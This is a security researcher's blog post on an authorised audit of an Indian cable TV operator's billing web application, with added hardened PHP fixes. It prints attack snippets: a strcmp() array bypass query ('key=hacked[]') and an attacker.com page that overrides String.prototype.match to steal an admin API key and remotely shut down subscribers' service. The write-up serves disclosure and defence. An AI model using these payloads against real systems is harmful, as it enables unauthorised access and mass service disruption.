Low hanging Web Application bugs in Digital Cable: Hacking Cable TV Networks Part 1

    Hacking your cable TV Networks: Low Hanging Web Application bugs in Digital Cable TV.


    Check out the previous blog: http://www.garage4hackers.com/entry.php?b=2830
    Hacking Your Cable TV Networks: HITB Security Conference Part 0.


    We did two presentations on the security issues in Digital Cable TV networks back in February, one at Nullcon [Goa] and another at HITB [Amsterdam]. We disclosed a few of the many security issues we reported to a large cable network operator in India. The main highlight of the talk was that we [me & Ahamed Nafeez] did the presentations wearing the traditional dress [lungi, mundu] worn by the locals in Kerala. This was to appreciate all the help the natives gave us while we were conducting the research.



    Presentation material:

    The slides are available here: http://haxpo.nl/wp-content/uploads/2...ard-Style.pptx
    But I will be writing a series of blog posts explaining the bugs in detail here.

    Instead of following the same pattern I used for my talk [just explaining the bugs], I think it would be fun to share the adventures we had while doing the research. If you are only interested in the bugs, just head to the bug section; otherwise read on.

    It is hard to find any hands-on cable TV security material on the internet. This is mainly because the infrastructure used by cable operators is not easily available to every researcher. In our case we were lucky. From November 2013 I was working with one of the largest cable TV networks in India, which provides service to nearly 1 million users. I agreed to a contract where we would do free security audits of the cable operator's infrastructure and in return they would allow me to publish my findings at any conference of my choice. That was a sweet deal for me. I come from an application security background, and I had no clue about digital cable networks a year back. So in this first blog post I will explain how I cracked the deal with the cable operators to audit their infrastructure.


    Cracking the Deal: Meeting with the Chief Technical Officer of the Cable Company

    Unlike the Internet, where information is viewed with suspicion and misinformation can be quickly vetted through other sources, television is a one-to-many medium where there's no quick way to identify a false broadcast. If someone hacks into a TV news stream and publishes news stating that a riot has happened in a nearby city, that could create a lot of panic in a country like India.
    Example source: hackers took control of TV feeds in Wenzhou, China and streamed anti-communist slogans to millions of viewers.

    This was the main punch line I used when trying to convince the CTO why they should have penetration testing done on their infrastructure. Since he had not seen any real-world attacks on his infrastructure, he was not that convinced to give me the project. But in the end he asked me if I could find any issues from the outside, sort of like black-box testing, and if I could find something serious in 2 weeks he would consider giving me an opportunity.

    Web Application bugs in Digital Cable TV:


    I had two weeks and needed to find something quickly. I started doing my homework and learned one thing: there are nearly 1 million users for this service provider, and there are about 2000-3000 local cable operators, the local vendors who distribute the service to individual localities. All these 2000+ cable operators need some sort of application where they register the users in their locality, manage their billing operations etc., and there needs to be some sort of centralized application to perform these operations. With some awesome Google hacking techniques we were able to locate their centralized billing application, aka the Middleware server, on the Internet [Woot Woot].

    Bug 1: Code execution on Billing Server

    In not much time I was able to hijack the Middleware server. A small misconfiguration on their web server led to this hijack [I am not allowed to talk about it]. What you see listed in the screenshot are all the connected set-top-box users who are clients of a particular local cable operator. Notice those red buttons on the left: they could be used to remotely shut down a user's cable service in case of a missing payment or similar. This was more than enough to explain the criticality, but I wanted to find more bugs so that it would be convincing.



    Bug 2: Set-top Box Hijack [STB]

    The above web application allowed one operator to transfer an STB to another operator. So, for example, if a user Rahul from the city of Delhi relocates to the city of Agra, then Rahul could get his STB unregistered from the local operator [D] at Delhi, get it reassigned to operator [A] at Agra, and continue using the STB and cable service.

    In the web application there is an option that lists all existing local operators. The transfer takes place on the basis of an access key: operator A needs to notify operator B about the transfer and share his access key with operator B. This access key implementation was flawed.

    The pseudo code was somewhat similar to this:

    PHP Code:
    <?php
    // pseudo code: $apikey stands for the key fetched from the apis table for $username
    $apikey = "select api_key from apis where username='" . mysql_escape($username) . "'";
    // strcmp() returns 0 when both strings are equal
    $authenticated = strcmp($apikey, $_GET['key']);
    if ($authenticated == 0) {
        print "Logged IN !";
    } else {
        print "wrong API!";
    }
    ?>
    Old bug, PHP < 5.3.*: passing an array bypasses the check.



    In PHP versions older than 5.3 the strcmp() implementation does not do strict type checking, and if an input to strcmp() is an array it returns NULL plus a warning. Under PHP's loose comparison NULL == 0 is true, so simply passing an array instead of the access-key string, localhost/program.php?key=hacked[], bypasses the key check. With this bug any local operator would be able to hijack any other operator's STBs without having a valid access key.
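    The following is an added example, not code from the post or from the billing application it describes. It puts the loosely-typed comparison that let the array through next to a hardened version of the same access-key check. The stored key is a constructed sample value (the real one came from the database), and the input list imitates the kinds of values PHP builds from a query string.

```php
<?php
// Added example, not code from the post or from the billing application.
// The stored key is a constructed sample; in the real application it came from the database.

$storedKey = 'sample-key-0123456789abcdef';   // constructed sample value

// Root cause of Bug 2: on PHP < 5.3, strcmp() given an array returned NULL (with a
// warning) instead of an integer, and the check compared that result with loose "== 0".
// NULL == 0 is true, so the array "matched" the key. A current interpreter throws a
// TypeError from strcmp() on an array, so only the comparison itself is reproduced here.
function looseZeroCheckPasses($strcmpResult): bool
{
    return $strcmpResult == 0;    // the original pattern: loose comparison
}

// Hardened check: reject non-strings first, enforce the key's expected shape, then
// compare with hash_equals(), which accepts only strings, returns a real bool and runs
// in constant time (so it also does not leak how many leading bytes matched).
function checkAccessKey(string $storedKey, $suppliedKey): bool
{
    if (!is_string($suppliedKey)) {
        return false;                                // arrays, null, ints: rejected
    }
    if (!preg_match('/^[A-Za-z0-9-]{16,64}$/', $suppliedKey)) {
        return false;                                // not a plausible key at all
    }
    return hash_equals($storedKey, $suppliedKey);
}

// Demo over the kinds of input a query string can produce (?key=..., ?key[]=x, none).
$inputs = [
    'correct key       ' => 'sample-key-0123456789abcdef',
    'wrong key         ' => 'sample-key-ffffffffffffffff',
    'array (?key[]=x)  ' => ['x'],
    'missing (null)    ' => null,
];
foreach ($inputs as $label => $value) {
    printf("%s -> %s\n", $label, checkAccessKey($storedKey, $value) ? 'accepted' : 'rejected');
}
// Only the first line prints "accepted".

var_dump(looseZeroCheckPasses(null));   // bool(true): what let the array through in the old code
```

    The is_string() guard is the part that matters: PHP will happily turn `?key[]=x` into an array and hand it to whatever function reads $_GET, so any comparison that trusts the type of user input is one query-string edit away from being skipped. hash_equals() needs PHP 5.6 or later; on older interpreters an `is_string()` check followed by a strict `===` comparison removes the type-juggling bypass, though not the timing difference.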



    Bug 3: Cable TV Remote Shutdown: CSRF bypass.




    Cable TV operators control clients via a unique key [Chip ID], as seen in the screenshot.
    This is accomplished via API keys specific to the logged-in admin. The implementation was flawed.
    The bug allowed an attacker to remotely shut down all of a cable operator's Digital TV instances once that operator visited a malicious webpage.

    API Key Implementation


    They had a super secret JS file, which gets dynamically loaded for a given admin.


    Code:
    <script src="load_secrets.js"></script>
    They had some pretty cool anti-stealing code as well.
    Code:
    function checkUrl()
    {
      var url = get_current_url();   // their helper: returns the current page location
      return url.match(url+'$') == 'flappybirds.com';
    }
    if(checkUrl())
    {
      var api_key = "77d11aea20ff61c6d1e23f044";alert(api_key);
      populateFormFields(api_key); // Injects this token into the hidden input fields
    } else{
      alert('Bad Domain !');
    }
    The Bypass:


    An attacker can load <script src="load_secrets.js"></script> from their own page.
    But checkUrl() returns false there and the attack would not work. The attacker can bypass this using:


    Code:
    // From attacker.com
    <script>
    String.prototype.match = function()
    {
      return ["flappybirds.com"];
    }
    </script>
    <script src="http://cable-tv.com/api_keys/load_secrets.js"></script>
    You should check out Ahamed Nafeez's slides from HITB to learn more about similar cool JS bugs:
    http://haxpo.nl/wp-content/uploads/2...ill-Itself.pdf

    We can host this code cross-domain and make String.prototype.match, the JavaScript .match() function, always return the value we specify. So if a local cable TV operator visits our page, we could steal his API key hidden in the JS and then use it to shut down all users in his locality. Remember the shutdown button I mentioned in the previous bug? We used that shutdown feature to create a working POC. Check out the demo. Now any user's cable access could be remotely shut down by an attacker.
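    The fix for Bug 3 has to live on the server, because a browser executing the attacker's page will run whatever JavaScript the attacker wants, including a replaced String.prototype.match. The following is an added example, not code from the post or from the operator's web application. It replaces the "secret JS file" with a per-session CSRF token that is stored server-side, rendered only into the same-origin HTML form, and verified together with the request's Origin header before a shutdown is executed. The session, POST and header arrays stand in for $_SESSION, $_POST and the request headers; the host names cable-tv.com and attacker.com are the ones used in the post, and the chip id is a placeholder.

```php
<?php
// Added example, not code from the post or from the cable operator's application.
// Session/request arrays are constructed stand-ins for $_SESSION, $_POST and headers.

// Issue one random token per login session, stored only on the server.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// The token reaches the browser inside the same-origin page body, never in a loadable
// .js file: a cross-site page can execute another origin's scripts, but cannot read
// its HTML, so there is nothing for String.prototype tricks to pull out.
function renderShutdownForm(string $chipId, string $csrfToken): string
{
    return '<form method="post" action="/stb/shutdown">'
         . '<input type="hidden" name="chip_id" value="' . htmlspecialchars($chipId, ENT_QUOTES) . '">'
         . '<input type="hidden" name="csrf_token" value="' . htmlspecialchars($csrfToken, ENT_QUOTES) . '">'
         . '<button>Shut down</button></form>';
}

// Browsers attach Origin (or at least Referer) to cross-site POSTs. Compare the parsed
// host exactly; a string-prefix test would accept "https://cable-tv.com.attacker.com".
function originIsOwn(?string $headerValue, string $ownHost): bool
{
    if ($headerValue === null) {
        return false;
    }
    $parts = parse_url($headerValue);
    return is_array($parts) && isset($parts['host'])
        && strtolower($parts['host']) === $ownHost;
}

// Validate a shutdown request. Returns null when it may proceed, else the refusal reason.
function validateShutdownRequest(array $session, array $post, array $headers, string $ownHost): ?string
{
    if (empty($session['admin_id'])) {
        return 'not logged in';
    }
    $token = $post['csrf_token'] ?? null;
    if (!is_string($token) || empty($session['csrf_token'])
            || !hash_equals($session['csrf_token'], $token)) {
        return 'csrf token missing or wrong';
    }
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if (!originIsOwn($origin, $ownHost)) {
        return 'cross-site origin';
    }
    return null;
}

// Demo: the operator's own admin page versus a request forged from attacker.com.
$session = ['admin_id' => 7];                    // constructed: a logged-in operator
$token   = issueCsrfToken($session);
$chipId  = 'CHIP-ID-PLACEHOLDER';                // placeholder, not a real chip id

echo renderShutdownForm($chipId, $token), "\n";

$own = validateShutdownRequest($session,
    ['chip_id' => $chipId, 'csrf_token' => $token],
    ['Origin' => 'https://cable-tv.com'], 'cable-tv.com');
echo 'own page:      ', $own ?? 'allowed', "\n";      // allowed

$forged = validateShutdownRequest($session,
    ['chip_id' => $chipId, 'csrf_token' => 'not-the-token'],
    ['Origin' => 'https://attacker.com'], 'cable-tv.com');
echo 'attacker page: ', $forged ?? 'allowed', "\n";   // csrf token missing or wrong
```

    The two checks back each other up: the token defeats a forged request even if the Origin header is absent, and the Origin check catches a request that somehow carries a leaked token. Marking the session cookie SameSite=Lax or Strict (the `samesite` option of session_set_cookie_params() on PHP 7.3 and later) adds a third layer, since the browser then does not send the operator's session cookie with a cross-site POST at all. None of this depends on client-side code, which is the point: checkUrl() ran inside the attacker's page and answered to the attacker's prototype chain.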


    Imagine some attackers doing this shutdown hack at the time of the World Cup; that would result in pandemonium. Anyway, these many low-hanging bugs were enough to convince the CTO to give us the project, and woot woot, we were given access to their infrastructure and a small garage to work in. I will write about more bugs in the coming days. Keep yourself updated via my Twitter page http://twitter.com/fb1h2s or the Garage Facebook page https://www.facebook.com/Garage4Hackers.

    Regards.
    Rahul Sasi

    This article was originally published in the blog: Low hanging Web Application bugs in Digital Cable: Hacking Cable TV Networks Part 1, started by fb1h2s